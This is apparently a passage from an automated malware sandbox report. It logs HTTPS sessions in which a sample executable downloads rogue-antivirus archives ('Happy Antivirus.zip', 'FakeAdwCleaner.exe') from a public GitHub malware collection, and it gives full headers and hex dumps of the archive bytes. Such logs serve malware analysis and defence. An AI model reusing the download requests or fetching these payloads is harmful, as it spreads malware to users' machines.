                                                                                                                                                2022-09-29 12:51:35 UTC11701INData Raw: 05 6d a9 84 5a 8a a5 f9 07 b6 49 bf b8 ee 87 18 9c 9d 28 03 60 71 0a 85 ee d4 41 85 aa b4 c5 87 5e 2f 3c 0e b3 70 21 8b f7 25 06 cf 9f ca 2a c9 05 14 d3 09 4d 92 19 d2 c2 ff 25 51 c5 5e 75 49 b0 b1 0a bb b0 fc 59 ed ca 8a 58 8d ee 0a 2b 40 9c 06 a0 3c 44 91 fc a9 d3 2e 58 da 82 b5 46 8e b6 cf b9 c4 e5 f3 a0 6d 42 eb a9 3a 40 f0 49 82 09 46 bc 94 76 6f 0d fb b6 c0 89 11 24 f7 38 d4 76 c4 12 43 4b fd 0f 05 d9 81 95 19 0e c8 66 ee 18 e0 58 b3 ae e0 05 44 75 a8 ae 09 fd 35 cf e7 31 03 13 41 be 2c e8 c8 57 51 5e 92 bc 56 67 6e 8b 67 b0 7e cc be 98 9f 31 56 ef 1c 02 3b 45 1d a1 64 1d 1d a8 1e 16 0e 08 bd ca 26 db 66 54 cc 79 2f 1b dc 8e 10 89 f3 db 47 90 82 00 63 81 8f 1d 7c 69 12 45 a3 fe 33 87 e4 05 91 c6 35 40 4b 1b bc a2 f7 e8 01 0d d3 5f 86 3b 5b ae d1 99
                                                                                                                                                Data Ascii: mZI(`qA^/<p!%*M%Q^uIYX+@<D.XFmB:@IFvo$8vCKfXDu51A,WQ^Vgng~1V;Ed&fTy/Gc|iE35@K_;[
                                                                                                                                                2022-09-29 12:51:35 UTC11717INData Raw: 49 a2 72 6a 8c b8 0f 7a e3 95 f3 fb ca 87 96 74 f7 22 7d 4c a4 68 48 ae e6 ca 8f 98 ce f1 03 aa a2 c4 c3 c6 58 a6 74 87 8e 37 8e d5 af ea 12 98 d8 fb 4e 3a 2c 6b 11 55 28 0a 09 76 87 24 65 d3 cd 6e 71 0e 35 56 49 71 b5 25 7e ae 86 ca b4 27 61 7e 3c 01 a2 5c d3 b7 7e a1 6f c6 de 87 eb 31 0f 2e 93 c5 bd da b5 d4 51 72 3c fd c7 b4 a0 31 a2 1b 7e 55 9c c5 f0 95 d5 b1 c3 0b fe d6 3d ef 66 33 f6 73 87 0d 40 80 65 3b d1 41 ee 59 e0 ca 8a 08 09 08 b1 d7 4e dd 58 e9 29 17 be 44 56 ba 8a a8 45 df e0 1f d0 68 28 2e 8b 23 d4 f6 f5 05 54 72 8b bd 76 90 49 2f 3d a4 00 5a 32 6e b0 be 8f ce 69 b1 3b ae a9 61 81 cc aa 9e b9 a7 ec 4a 52 3c 13 d0 ab f7 6b dc a7 8a 40 8a a7 7b 1f 93 68 2d f9 a2 77 a8 00 f6 ee aa 30 59 79 e3 5a fb a5 11 62 ed f0 6b 9b 09 9f a9 03 4e 9b 77 10
                                                                                                                                                Data Ascii: Irjzt"}LhHXt7N:,kU(v$enq5VIq%~'a~<\~o1.Qr<1~U=f3s@e;AYNX)DVEh(.#TrvI/=Z2ni;aJR<k@{h-w0YyZbkNw
                                                                                                                                                2022-09-29 12:51:35 UTC11733INData Raw: b7 e0 22 fc 1f 28 f9 4f aa ba f7 f0 0f d6 f9 a8 c0 aa d7 27 1e db 49 7c 78 82 97 fd 77 86 9b 01 ac 69 10 31 6e bf d5 e7 01 c5 f1 8d 8b 91 81 5f 0b 77 7f 8c 11 79 44 69 37 fd 16 8b cd f6 b4 97 76 39 69 10 e4 f8 c6 93 18 d1 74 d3 01 4b f4 82 94 6d ac d7 9d af 21 3b fa 42 ae e9 82 66 c5 f8 15 e1 1d a1 a0 c1 38 5b b2 40 43 27 24 2b b8 a4 f0 84 0a f9 b0 6a 4d d9 9e 86 c0 36 4f fb 62 c1 8c 8a 56 cb 57 0a e3 c3 56 54 24 3e 32 c4 6b d9 20 50 c6 97 54 4d 51 a2 8c da f8 4c ee cd 7f bb 67 f7 12 a4 7b fd 41 dd 16 5d 08 59 c9 ee 2e ef b4 2b a6 ec b2 81 da ef 9d dd 85 cc 6d 66 ed 82 77 a8 d2 cc c4 4b 0d fb ce 5e d2 4d 7f 09 7c 4a 60 e8 23 84 6a 87 df c6 71 f1 d6 4f 63 c8 16 59 56 0c 03 e3 43 82 45 1a 7c b3 47 2e 34 c0 ca 98 bc 9a bd f0 59 14 f2 56 7c f8 7c b9 7a 73 bf
                                                                                                                                                Data Ascii: "(O'I|xwi1n_wyDi7v9itKm!;Bf8[@C'$+jM6ObVWVT$>2k PTMQLg{A]Y.+mfwK^M|J`#jqOcYVCE|G.4YV||zs
                                                                                                                                                2022-09-29 12:51:35 UTC11749INData Raw: d0 1a 29 47 a6 9a 78 d3 16 01 e9 39 43 d3 67 52 0f 14 94 26 df f7 5f b3 e1 2c 4b 90 36 64 bd 14 f9 60 ce 20 ed 43 f4 11 96 6d 4a a1 db 85 42 55 4e 66 5a 6d e4 e9 ab 63 d8 0e 7e 89 a4 a7 b7 b6 19 49 c1 e5 1b 52 09 65 61 f1 af 91 c8 0a e8 84 2c 30 ed 37 7d 57 ae 8e 60 e2 99 8e df 9e f9 f3 84 19 19 fd 61 dc 20 0b 78 52 ad 3d 8e e8 9d 58 b5 92 57 9b b4 37 88 ea f4 87 06 f9 9c 89 89 5b 63 c2 15 8b 39 6a 96 1d e3 77 b7 f9 02 0e 1b 41 87 08 1f 67 17 6b 31 4f c7 34 5a a6 18 d7 49 59 2c af 44 be 64 3e 4c 1d 29 6e d4 a0 46 69 34 80 2c b3 84 b0 5a 5c d8 bb 61 50 ab 11 01 95 f4 2a d8 5e 8c 49 59 1c 4b 2b 9d 82 14 b4 76 1e 01 ce 17 15 b1 11 60 a6 d5 99 3b c7 e8 7f 13 4b 01 7d a7 20 7f 6c 6c e0 06 04 16 e0 2e c8 83 dc dd f1 5b 86 03 65 d3 9f f2 17 59 6e 4e e2 e6 96 16
                                                                                                                                                Data Ascii: )Gx9CgR&_,K6d` CmJBUNfZmc~IRea,07}W`a xR=XW7[c9jwAgk1O4ZIY,Dd>L)nFi4,Z\aP*^IYK+v`;K} ll.[eYnN
                                                                                                                                                2022-09-29 12:51:35 UTC11765INData Raw: 1a ac 8e 93 f8 46 15 fc 33 55 44 38 3c cd cb e9 2c 91 f1 36 98 5b 8b 29 c8 a5 bf e5 56 e1 28 65 dc c5 12 15 06 d8 bf cd ea e6 39 3c c4 e2 a9 1c 56 98 c5 00 e3 31 82 67 ce b1 59 f6 72 5e f9 b2 f0 b5 66 d9 4e ef af ae 1b e1 c2 b3 31 57 37 df 0b 52 d7 7c 69 00 28 a1 d6 92 81 52 c0 f0 fa 83 fb 54 0f 08 8d 12 ab df 98 59 70 5d d9 d3 53 32 41 6f 09 61 d1 b8 fc 89 b3 40 f6 31 72 b3 68 c2 6b 1e 1a dc 54 85 cf fb ae ca 51 62 ec af e6 d8 54 d1 3e 1b f8 3a 44 fc 4c 06 1d 90 2b 26 cb 34 8b 4c 11 44 3a 2f 86 2a 72 5d 6b d1 b0 22 d0 cc ec 2d ad b9 13 93 2a e4 ce c4 d4 3b 53 76 ab a5 49 a6 be d3 44 c3 fd a1 ca e7 af e4 ae 75 98 b0 6d d2 91 d8 66 d5 98 e2 2a 01 6f 07 16 75 bd ac 5e 74 dc d4 e3 c2 45 71 c2 ff bf d0 9e 61 59 a0 d0 49 dc 5c 24 6e 53 41 7e c8 0d bb 31 bf f8
                                                                                                                                                Data Ascii: F3UD8<,6[)V(e9<V1gYr^fN1W7R|i(RTYp]S2Aoa@1rhkTQbT>:DL+&4LD:/*r]k"-*;SvIDumf*ou^tEqaYI\$nSA~1
                                                                                                                                                2022-09-29 12:51:35 UTC11781INData Raw: af 24 1c 6c d2 7e 19 aa 17 55 59 69 f5 32 7e cd 51 4d fd ad 64 36 e2 19 d8 f2 0d 0b b1 25 9c ad 90 41 66 cf 1d be 81 40 74 ae ca be 92 e5 8e bf a6 8a c1 19 c1 9a f7 c0 ae 8b ce 9a a7 1a 42 e8 e9 63 86 36 f3 39 f7 e8 dd 2a ae 1b 83 b8 09 3b b0 3e 9f 21 56 0f 00 e5 f2 5c 0d 44 7e 2e 70 6d 68 f5 2f 9c 33 d6 47 ef d6 d5 ce 94 20 5c 86 14 c6 02 b5 60 de 5f 56 b2 09 0b 39 fb ba 86 fc eb 93 48 63 69 e1 99 9a f7 63 b0 d2 b9 89 a2 98 c9 47 60 ee 51 f7 30 66 83 89 89 f3 a7 14 9a 74 7a 60 86 49 e8 ca d0 f9 83 32 b4 fc 06 82 7b 2b be 9b c9 b5 70 62 6f 61 08 9a 93 cd 05 aa f5 c7 a5 fe e5 ca 08 b2 21 f3 59 6f 26 e7 7b 48 af 4e fd 9a 2d 94 72 55 58 03 6a 50 cd d0 f0 c6 48 2f 02 43 b3 6b 01 80 2c 66 10 b1 61 6a 23 d0 57 2d 47 08 10 12 a4 20 91 d2 91 18 65 88 01 75 d2 f3
                                                                                                                                                Data Ascii: $l~UYi2~QMd6%Af@tBc69*;>!V\D~.pmh/3G \`_V9HcicG`Q0ftz`I2{+pboa!Yo&{HN-rUXjPH/Ck,faj#W-G eu
                                                                                                                                                2022-09-29 12:51:35 UTC11797INData Raw: 62 dd 10 79 8f d2 8e f2 7d f9 5b a9 0d 8d d8 db b0 86 7e a0 a1 22 68 24 49 1f 3e b9 b9 84 6d b5 1c b4 a3 6e f9 7b d2 a6 ae 7e 3e 36 f7 37 5e cc 27 d3 f9 e2 d4 6f 1b 4d 1b f9 66 33 98 22 87 a7 61 63 2d 05 f0 7f 5e 74 e2 a1 16 d9 bb 90 96 fd 6b 80 9c d6 5d 48 a3 ec d7 b6 da fb fd c6 99 a0 ca fa 27 05 b1 13 6e 9e b8 0c 86 1e e9 8d 0e 3f 08 02 5e a1 da 99 f0 e0 5f 53 d5 65 43 3c 29 65 a7 ab ef 1b 11 56 ee 30 ab ef b0 86 2d 33 6c d5 cd a4 24 25 4f 8f 07 f0 7b 5a 70 bf 2b da 25 dc 55 51 bf 17 a8 81 ed 84 8e 11 4e 4d 3f bd 9e 7f ae 7d e0 37 d2 a1 f1 d3 f5 4b 8e 62 d8 d7 fc d9 6a b8 db e0 96 90 63 75 61 d5 42 6e e5 1b cb c7 29 e1 de a0 c3 6e 17 41 12 1c c3 52 d8 31 1e df aa e5 bd a3 90 35 3a 3e 3f ee e5 97 9f 7a f6 e1 fb 84 e1 88 fa 17 bd 05 97 83 96 9a 2e e4 e0
                                                                                                                                                Data Ascii: by}[~"h$I>mn{~>67^'oMf3"ac-^tk]H'n?^_SeC<)eV0-3l$%O{Zp+%UQNM?}7KbjcuaBn)nAR15:>?z.
                                                                                                                                                2022-09-29 12:51:35 UTC11813INData Raw: 00 20 00 00 00 00 00 00 00 45 6e 64 65 72 6d 61 6e 63 68 40 46 61 6b 65 41 64 77 43 6c 65 61 6e 65 72 2e 65 78 65 0a 00 20 00 00 00 00 00 01 00 18 00 00 1e d0 07 a5 47 d0 01 c8 aa 11 dd 09 04 d5 01 a8 a9 d3 be 09 04 d5 01 50 4b 05 06 00 00 00 00 01 00 01 00 6f 00 00 00 90 bc 02 00 00 00
                                                                                                                                                Data Ascii: Endermanch@FakeAdwCleaner.exe GPKo


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                38192.168.2.549738140.82.121.3443C:\Users\user\Desktop\4d44bed6.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                2022-09-29 12:51:35 UTC11813OUTGET /Endermanch/MalwareDatabase/raw/master/rogues/Happy%20Antivirus.zip HTTP/1.1
                                                                                                                                                Host: github.com
                                                                                                                                                2022-09-29 12:51:35 UTC11813INHTTP/1.1 302 Found
                                                                                                                                                Server: GitHub.com
                                                                                                                                                Date: Thu, 29 Sep 2022 12:50:04 GMT
                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
                                                                                                                                                Access-Control-Allow-Origin: https://render.githubusercontent.com
                                                                                                                                                Location: https://raw.githubusercontent.com/Endermanch/MalwareDatabase/master/rogues/Happy%20Antivirus.zip
                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
                                                                                                                                                X-Frame-Options: deny
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-XSS-Protection: 0
                                                                                                                                                Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                Expect-CT: max-age=2592000, report-uri="https://api.github.com/_private/browser/errors"
                                                                                                                                                2022-09-29 12:51:35 UTC11814INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 64 65 66 61 75 6c 74 2d 73 72 63 20 27 6e 6f 6e 65 27 3b 20 62 61 73 65 2d 75 72 69 20 27 73 65 6c 66 27 3b 20 62 6c 6f 63 6b 2d 61 6c 6c 2d 6d 69 78 65 64 2d 63 6f 6e 74 65 6e 74 3b 20 63 68 69 6c 64 2d 73 72 63 20 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 20 67 69 73 74 2e 67 69 74 68 75 62 2e 63 6f 6d 2f 61 73 73 65 74 73 2d 63 64 6e 2f 77 6f 72 6b 65 72 2f 3b 20 63 6f 6e 6e 65 63 74 2d 73 72 63 20 27 73 65 6c 66 27 20 75 70 6c 6f 61 64 73 2e 67 69 74 68 75 62 2e 63 6f 6d 20 6f 62 6a 65 63 74 73 2d 6f 72 69 67 69 6e 2e 67 69 74 68 75 62 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 20 77 77 77 2e 67 69 74 68 75 62 73 74 61 74 75 73 2e
                                                                                                                                                Data Ascii: Content-Security-Policy: default-src 'none'; base-uri 'self'; block-all-mixed-content; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com objects-origin.githubusercontent.com www.githubstatus.


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                39192.168.2.549739185.199.108.133443C:\Users\user\Desktop\4d44bed6.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                2022-09-29 12:51:35 UTC11816OUTGET /Endermanch/MalwareDatabase/master/rogues/Happy%20Antivirus.zip HTTP/1.1
                                                                                                                                                Host: raw.githubusercontent.com
                                                                                                                                                2022-09-29 12:51:35 UTC11816INHTTP/1.1 200 OK
                                                                                                                                                Connection: close
                                                                                                                                                Content-Length: 1721302
                                                                                                                                                Cache-Control: max-age=300
                                                                                                                                                Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                                                                                Content-Type: application/zip
                                                                                                                                                ETag: "bb71b3fc58fb603cf14e33295d1c8eaf2a0ad05101b7a8b78df809147209e36e"
                                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                X-Frame-Options: deny
                                                                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                                                                X-GitHub-Request-Id: 9B5A:0543:E4C62A:F30433:63359351
                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                Date: Thu, 29 Sep 2022 12:51:35 GMT
                                                                                                                                                Via: 1.1 varnish
                                                                                                                                                X-Served-By: cache-mxp6951-MXP
                                                                                                                                                X-Cache: HIT
                                                                                                                                                X-Cache-Hits: 1
                                                                                                                                                X-Timer: S1664455896.566091,VS0,VE221
                                                                                                                                                Vary: Authorization,Accept-Encoding,Origin
                                                                                                                                                Access-Control-Allow-Origin: *
                                                                                                                                                X-Fastly-Request-ID: 8419c9744b5afece9dc7438a377592f451b01c7b
                                                                                                                                                Expires: Thu, 29 Sep 2022 12:56:35 GMT
                                                                                                                                                Source-Age: 0
                                                                                                                                                2022-09-29 12:51:35 UTC11816INData Raw: 50 4b 03 04 14 00 01 00 08 00 1c 34 33 4c d9 8f 00 b3 16 43 1a 00 00 a2 1e 00 1d 00 00 00 45 6e 64 65 72 6d 61 6e 63 68 40 48 61 70 70 79 41 6e 74 69 76 69 72 75 73 2e 65 78 65 f8 2b 0e 2e 8c 29 68 4b e2 fb 48 16 3b 20 4e 07 3a 4e 83 02 e6 8c a5 48 55 e4 32 b4 95 93 c6 a0 c3 7c ab 92 e0 87 d0 02 d5 04 78 62 70 65 75 9a 97 86 11 34 98 97 cd 97 73 74 dc 2c 4f 22 09 b0 c7 96 32 1d dc ca 93 24 ea 9d 57 89 17 31 56 cd df 61 9d e8 1e 3e f6 5c 66 8d 23 70 99 5c 0c 9a 19 24 e2 d8 c2 3c 6d a8 d2 5a be fc 3a 13 61 f6 f5 7a b5 d9 f8 42 70 0a 62 f9 42 c3 b2 50 ae e2 70 4f 5a 25 72 a4 ee b3 0f 10 eb e1 04 4a 1a c8 a6 26 29 7b ed 6e 8c cf 45 da 01 e7 d0 73 ba 2b 43 92 58 a7 d6 5f be fa 1e 84 cd ad fd 63 14 66 6a db 88 d7 78 2b d4 d3 70 17 58 a2 ea 55 e1 92 3a 15 2f 21
                                                                                                                                                Data Ascii: PK43LCEndermanch@HappyAntivirus.exe+.)hKH; N:NHU2|xbpeu4st,O"2$W1Va>\f#p\$<mZ:azBpbBPpOZ%rJ&){nEs+CX_cfjx+pXU:/!
                                                                                                                                                2022-09-29 12:51:35 UTC11818INData Raw: b5 53 d3 9c b3 09 c1 8e 8c f4 67 13 a1 5b 47 b1 d0 aa e0 fb 1c c7 d6 a4 30 fc 4a a5 34 07 ec cd 83 87 f6 d1 be e0 e7 42 ed c5 8e b1 c1 fb 18 a1 1d 7b 82 5b 5e 57 83 e3 52 2c 47 84 51 08 27 7e f3 6c 32 4f 33 4c 67 e7 1d fd 64 b3 b4 e9 5a 09 d2 b9 c6 a9 41 4d 82 2d ec 34 1d 3c 3b e6 19 27 57 7f 20 ac f2 17 37 09 40 c7 3a 92 b3 bd 3e 5f 62 2d 64 af ab 22 e0 c6 f8 66 1f 96 a8 77 7d 9d ba fd 05 f3 0b 0a 44 01 40 5c b8 e9 d3 a4 fa df a3 95 ef 04 64 e0 5d 73 fb b0 09 b3 35 b8 6b d4 3d 80 e2 f0 d4 31 54 37 de ee 08 59 59 12 87 e6 0c 82 d8 a3 78 2a b1 86 1c 7d 2d 26 35 5c d7 34 9e 19 d1 88 93 ac d3 df 9f 15 80 92 98 f0 8b 67 17 ce c6 0c 1d 0f 12 d2 5f 6d b1 8a 77 c0 ef 05 ce 9a 78 a4 0d 8c be c0 7c 69 89 1b 48 74 e0 be 58 bb 17 bd b7 c2 f1 b2 20 e8 76 eb db 9d 3c
                                                                                                                                                Data Ascii: Sg[G0J4B{[^WR,GQ'~l2O3LgdZAM-4<;'W 7@:>_b-d"fw}D@\d]s5k=1T7YYx*}-&5\4g_mwx|iHtX v<
                                                                                                                                                2022-09-29 12:51:35 UTC11819INData Raw: 1e ac cf 08 73 95 5c 23 20 a5 db 01 3b 98 84 42 aa 9e 70 c8 9c a8 a5 de d6 08 e3 28 8b 65 ba 2e 60 62 ec b8 42 43 03 13 18 93 d2 b5 a3 11 7a a1 85 e5 96 13 1e 4d 93 43 5c c1 39 77 59 59 28 e1 ea 24 90 96 a7 3d 7c 2c 49 20 cc 89 3c a3 b0 47 94 41 8b 82 e6 17 ec 0a 01 f9 26 73 11 ea 52 d3 c3 b3 23 2a 97 61 a3 08 2b fe be 6c 4e 32 dd e9 29 cb 7f 05 03 9c 36 0d 25 1b be fc ec 98 69 60 81 bd 0c c1 ec f6 53 52 a1 2b a2 f4 99 d5 f9 33 74 8e 4f 15 49 93 5b 65 c2 96 a4 32 ae 9a 2e 19 42 1f 0d 7f c2 46 20 0b 40 ed 95 98 a8 ff 13 8a ea bf 37 2a d1 ac 87 73 73 a3 f5 19 1e ef 3e a5 0c 06 c1 4e 12 6d 33 78 c2 d3 ff 6f 2e 0a 04 2a 2a d5 a9 36 8d de 19 11 02 07 4d 07 6f 19 d0 41 97 15 47 76 b7 b4 6b 54 3a 42 cf e3 56 5c dc 5b 75 8c b1 ca 36 1c 12 20 08 e6 b3 b6 c0 f6 2e
                                                                                                                                                Data Ascii: s\# ;Bp(e.`bBCzMC\9wYY($=|,I <GA&sR#*a+lN2)6%i`SR+3tOI[e2.BF @7*ss>Nm3xo.**6MoAGvkT:BV\[u6 .
                                                                                                                                                2022-09-29 12:51:35 UTC11820INData Raw: ac 43 2f a2 90 f0 31 90 f4 64 d2 ad 64 7e d3 7a 52 03 98 51 5f 4c 3e 3b 9d 64 51 19 57 c8 8d 75 ec a6 11 e6 36 43 ba 68 f3 45 3a 90 5b da 25 cf ca 35 d7 d6 dc f2 82 45 32 12 0f a0 13 f3 1e c0 46 7d 6e 18 bc 45 6a 23 85 eb 55 2f 5c ed 44 86 e5 7d 7f 3c c3 95 77 de ac cd b1 6e b1 cf c3 ef 36 8b 4f ae 72 08 c8 c4 98 c1 de cc 7e af 7c cc d6 dd 4b cc 87 db eb 52 41 ea aa df 57 09 c0 22 ae c8 62 b5 15 e5 24 4b df 86 9a 5e a4 dc d1 0c 4c dc b9 fc c3 07 40 fe ac 1d 94 f3 f7 df c4 4a a3 de a9 a2 a4 ce c3 d6 4c 0e 5e 5d 0c ed 5f 97 59 fe 3f 6b f4 0f 90 44 98 1b 26 48 a4 ff d5 f8 7e 02 1e 88 1d 00 c4 f9 3f 5e 17 95 33 69 39 0e 47 1c de f3 47 cb f4 7c 39 21 59 fc 1d 14 fe ea a0 9e 40 3c 90 83 b1 e9 70 fc fb 6a 6a 15 56 6f c9 1b bc 73 78 23 e5 9c 25 9c 80 61 0b a6 9e
                                                                                                                                                Data Ascii: C/1dd~zRQ_L>;dQWu6ChE:[%5E2F}nEj#U/\D}<wn6Or~|KRAW"b$K^L@JL^]_Y?kD&H~?^3i9GG|9!Y@<pjjVosx#%a
                                                                                                                                                2022-09-29 12:51:35 UTC11822INData Raw: 58 a6 6f b4 b3 b2 32 c5 1d 5c 93 dd 85 fa 61 51 19 8f 8a e9 8a 7f bc d3 17 bf cc 5c 62 74 e7 3f 0f 19 95 91 7a f0 80 29 db a0 3f 13 1c 12 5a 76 54 c3 82 ba 0a 63 7d 71 31 a4 21 20 fb c6 97 5c 25 b2 be a7 e6 d3 50 28 1d 4a 20 b2 5c 11 1f 00 f4 6c 0b c0 dc 02 79 0f f6 70 5a 26 8f 1e 32 89 1e 1e 7c 52 3f 27 93 43 2a ad 4f e5 56 4c 09 0d d1 4f 47 4f 6b 7b 96 2d 6a ff 95 80 12 6a 78 9c f6 7a fc bf 77 14 cc 3e cf aa 64 8a e0 4c 0c dc 20 18 01 a5 b6 62 fa bb fe 32 86 35 0e 5d 93 08 87 ab 8c 07 3f 15 00 94 2e d8 52 8c 02 bf 48 9a c4 76 33 41 29 6d c5 d3 0e e1 0a 01 5f 97 69 9d d8 a1 48 22 28 64 9d d6 3a 88 38 2e a7 2a d2 41 01 64 f4 f1 82 70 d4 7a d9 8e 8d ab ec d4 fd 58 81 2e 6e e3 af 22 a8 e8 bb d3 ad cc db 36 26 3b 3d 72 82 e4 2e 9b 8e ec fd 2e e7 d4 6d 8d 3c
                                                                                                                                                Data Ascii: Xo2\aQ\bt?z)?ZvTc}q1! \%P(J \lypZ&2|R?'C*OVLOGOk{-jjxzw>dL b25]?.RHv3A)m_iH"(d:8.*AdpzX.n"6&;=r..m<
                                                                                                                                                2022-09-29 12:51:35 UTC11823INData Raw: a6 e2 2e ac 4a 78 04 36 8f 2c 37 5c cb 4a 01 d5 6a 23 a3 ff e4 b8 b6 c3 45 cb 06 1e 1a 8b a8 09 33 61 8c 3f 17 6a f3 80 a3 40 76 50 4b 16 2b 50 05 4e a6 e4 ee 96 6f 8f 0e 92 41 0d 1c 49 6c ae d7 36 75 3d 5f bd 47 e2 f4 5f ea 96 9c c7 09 5d 56 a6 e3 4d f5 53 94 cb c2 2b 96 98 0e 46 cd 3f 9f 36 48 da a4 a4 77 f4 ac 22 e0 07 ba b2 f1 44 99 ed 6d fd e8 04 de 58 51 0f 28 f3 c0 33 ab c9 43 c2 96 18 d4 fa 80 1a 07 cb 9b 26 00 fa d4 59 98 46 24 ce 27 0c c2 ec d1 a8 8e f3 57 f7 ab b2 cb 8a 20 22 77 4c 51 10 8d e1 ae 9f ba 71 23 e8 81 a1 58 8d 11 a8 9b d6 85 0a db d8 02 9c 43 e5 45 bc ad 73 ec 82 29 ae 64 82 ca 42 65 ce 94 04 d6 76 e3 d6 07 15 ed ba 48 94 5a 5b 18 41 81 38 80 bf bd 3d e3 7d c0 93 a1 9f 42 3a 78 d0 05 23 0e ac a4 b5 46 cb e9 30 f4 70 44 b4 38 0f 8f
                                                                                                                                                Data Ascii: .Jx6,7\Jj#E3a?j@vPK+PNoAIl6u=_G_]VMS+F?6Hw"DmXQ(3C&YF$'W "wLQq#XCEs)dBevHZ[A8=}B:x#F0pD8
                                                                                                                                                2022-09-29 12:51:35 UTC11825INData Raw: 00 19 df e4 2b 56 05 42 2d 7f 06 0a cf e6 b0 16 40 0f 72 65 c0 59 55 3d 81 b6 78 fb ef 52 c3 6b 1b c6 04 16 39 fe d7 b2 04 0f b9 72 a7 ec f3 c4 7b e0 00 95 12 df 45 3c b1 9c 98 f3 5d 8b 52 9f 1a 4e 15 7b c2 ae 39 75 96 96 9b 19 c3 ab 81 62 8a d5 c5 a5 da 9e cf 40 43 0a 49 47 12 69 31 da fe 57 c4 3b f1 92 4d a8 8c d7 60 e2 29 50 e4 4a 95 27 0b 19 0d 75 b5 7e 1a 03 66 85 cc 14 c2 47 4b 33 e8 c5 57 99 1a f9 57 a6 4d 38 c4 f6 a3 0f 1a 96 a9 fb 8d ea 1e 5c bc e0 d6 df 32 5c 6c a1 c9 01 cf 99 ea 14 71 c3 33 7c b7 ae 34 21 2f 82 13 39 02 d8 28 ed b3 2a 2b 98 2f 93 d8 cb 04 0f 47 0f 2e 17 32 d2 b5 b8 9f b4 73 0c 3d 79 6a 4d 16 d2 73 2d ee 9b 42 9e 8b 68 59 49 72 b5 f5 87 38 5d 80 dd cb d7 25 5b 90 49 2a 3e 68 ee 6d c2 19 66 84 a8 d2 ea 7c 01 e2 49 3c 90 4c 9d 12
                                                                                                                                                Data Ascii: +VB-@reYU=xRk9r{E<]RN{9ub@CIGi1W;M`)PJ'u~fGK3WWM8\2\lq3|4!/9(*+/G.2s=yjMs-BhYIr8]%[I*>hmf|I<L
                                                                                                                                                2022-09-29 12:51:35 UTC11826INData Raw: fa 62 b1 84 fb bb e5 1b ed a8 6e 7d bd 10 db 51 31 5b d4 ae 56 17 20 de d6 d3 88 cf 52 dc 44 7c 86 38 f2 5f 12 b2 15 97 e2 82 3f 35 4a 0c 86 9d ac ff bb fe 0e 4f de b2 8e 01 b7 91 f5 3d 0c 4c cd 21 4d 32 39 50 82 ce 54 3d d3 1c 25 3e 13 64 a7 c3 7b 18 ed 9d fb fe a9 c1 11 7f 09 99 59 ce c0 be 3d 9c 16 3a 2c ad e8 bc 69 86 a0 c1 fc 8d d0 06 6b 26 0a b9 24 68 5d 76 ec b1 1e 00 d1 43 53 41 9a 68 8a f8 8f 11 4c a9 2a 6c 27 c9 a7 0d b3 77 ac aa f2 07 99 5b e1 c8 76 43 b6 24 f1 d0 8d 3f 69 36 37 fa 2a 11 5b 1b f5 79 0f c9 a4 1e 33 29 48 a0 ce bd 12 d6 01 c5 2b 99 80 57 03 90 63 02 4d 55 da 27 37 57 55 41 e3 99 f0 c3 03 d4 0c 65 9c bb b6 35 b1 31 ca fa 0d 24 1d fa 95 2c 65 05 da 6f 30 5c 12 df a2 c0 5d 45 68 3a 92 86 a2 ff 1d 90 29 eb 84 a8 3c 84 c2 09 f6 b8 38
                                                                                                                                                Data Ascii: bn}Q1[V RD|8_?5JO=L!M29PT=%>d{Y=:,ik&$h]vCSAhL*l'w[vC$?i67*[y3)H+WcMU'7WUAe51$,eo0\]Eh:)<8
                                                                                                                                                2022-09-29 12:51:35 UTC11827INData Raw: ab f3 b2 67 e5 e2 c9 1f 70 e0 7c b5 59 b8 0d de 9f dd c6 80 b6 2d 74 d9 7f 1a 05 6f d6 2b ac 62 44 4e 63 23 00 27 69 cb 29 06 2d 66 27 a0 d2 54 1a b9 9e 81 a4 80 64 d3 f9 f7 d7 cd 51 b5 18 8b 53 9f c6 5a 97 da b3 10 69 2f 18 d6 f2 9d 2a db d9 47 8e e0 a2 7b 8b 9d f0 9c 74 1f bf 45 ca 29 14 94 0a 67 d7 3e 97 ec d6 fb d4 99 9a f2 5d 61 39 da c9 d8 8f 30 85 28 95 ea a3 a4 2e 46 e3 b0 01 5d bd 43 93 80 e4 5d c2 28 1c 77 60 55 62 3e 38 69 5c 68 5d 46 48 6e e3 d3 29 15 ba e2 83 29 3e dc a1 9d 9a 16 0d 1e c4 f8 b2 45 df 8f 14 9a 41 2c 76 b0 3c 1c 70 1a f0 41 c2 a1 9d 10 2c 8c 38 7f ce ff 19 94 b1 ef c3 8f 63 36 3b d1 e4 1c fe 9b 16 18 e6 60 8e 6b 6c 24 e3 b1 c5 cf b2 b6 db 63 09 d0 56 be fa 89 da af 35 dd e3 75 0d 58 8e 5d be b8 a5 47 e2 50 1e c2 0a fe 6a 15 29
                                                                                                                                                Data Ascii: gp|Y-to+bDNc#'i)-f'TdQSZi/*G{tE)g>]a90(.F]C](w`Ub>8i\h]FHn))>EA,v<pA,8c6;`kl$cV5uX]GPj)
